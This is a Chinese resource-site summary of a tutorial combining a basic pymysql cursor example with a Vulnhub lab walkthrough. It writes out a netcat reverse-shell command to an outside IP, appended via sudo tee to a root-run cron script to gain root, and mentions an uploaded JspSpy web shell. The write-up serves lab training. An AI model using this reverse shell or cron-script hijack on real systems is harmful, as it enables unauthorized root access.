Python操作MySQL与提权:Blumbergh用户下的数据库操纵与反弹Shell
需积分: 49 137 浏览量
更新于2024-08-08
收藏 6.72MB PDF 举报
"这篇教程详细介绍了如何通过Python操作MySQL数据库并利用权限提升到blumbergh用户,同时在Vulnhub渗透测试练习中应用这些知识。"
在这篇教程中,我们学习了如何利用Python与MySQL数据库进行交互,特别是关于cursor(游标)的概念。Cursor在数据库操作中扮演着关键角色,它允许程序逐条处理查询结果,而不是一次性加载所有数据。在Python中,我们通常使用`pyodbc`或`pymysql`等库来连接和操作MySQL数据库。例如,创建游标对象并执行SQL语句的代码可能如下:
```python
import pymysql
# 连接数据库
conn = pymysql.connect(host='localhost', user='username', password='password', db='database_name')
# 创建游标对象
cursor = conn.cursor()
# 执行SQL查询
query = "SELECT * FROM table_name"
cursor.execute(query)
# 获取所有结果
for row in cursor:
print(row)
# 关闭游标和连接
cursor.close()
conn.close()
```
接着,教程转向了一个安全场景,其中目标是提升到名为blumbergh的用户权限。在这个过程中,发现了一个名为`tidyup.sh`的清理脚本,它每3分钟执行一次,清空`/var/lib/tomcat6/webapps`下的所有文件。由于无法直接修改这个脚本,但可以以root权限运行`tee`命令,因此采取了利用`tee`重定向的方式来修改`tidyup.sh`。
首先,将反弹shell的命令写入一个临时文件`shell.txt`,然后使用`sudo /usr/bin/tee`命令将`shell.txt`的内容追加到`tidyup.sh`中。反弹shell的命令通常包含`nc`(网络工具),在这里的命令是`echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt`,这将启动一个监听特定IP和端口的shell。
完成文件修改后,通过监听`nc`等待shell反弹,一旦shell反弹过来,权限就是root,因为tidyup.sh是以root权限执行的。这样就可以查看并复制flag,这里flag是一张图片`flair.jpg`。通过之前上传的JspSpy工具,可以将图片下载到本地,最后查看到的flag信息是"I NEED TO TALK ABOUT YOUR FLAIR"。
整个过程展示了在Vulnhub渗透测试环境中如何利用系统漏洞和权限控制进行安全测试和挑战。Vulnhub是一个提供真实世界的安全漏洞环境的靶场平台,它包含了一系列的虚拟机镜像,如Breach1.0、Billu_b0x等,供安全研究人员和爱好者进行实战练习和技能提升。通过这些练习,我们可以熟悉不同的攻击手法和防御策略,提高网络安全意识和应对能力。
2073 浏览量
706 浏览量
121 浏览量
点击了解资源详情
点击了解资源详情
2020-09-09 上传
290 浏览量
点击了解资源详情
250 浏览量
淡墨1913
- 粉丝: 32
- 资源: 3803
最新资源
- js开发内库(prototype.pdf)
- 统一的 C# 3.0 规范现已提拱
- Linux内核完全注释
- 循环冗余校验码(CRC)的算法分析和程序实现
- file transfer using bluetooth
- Cygwin中文教程.pdf
- learn c++ in 21 days(pdf版)
- numpy book.pdf
- 高质量C编程指南 对程序员很实用啊
- java 综合面试题
- C8051F MCU 应 用 笔 记
- HELP-Function.txt
- Delphi(7 和2006、2007) 下用 IntraWeb开发WEB程序应用实战
- 8051f单片机应用笔记
- 2008' 全国中等职业学校技能大赛动画片题目
- 北大青鸟-影院售票系统PPT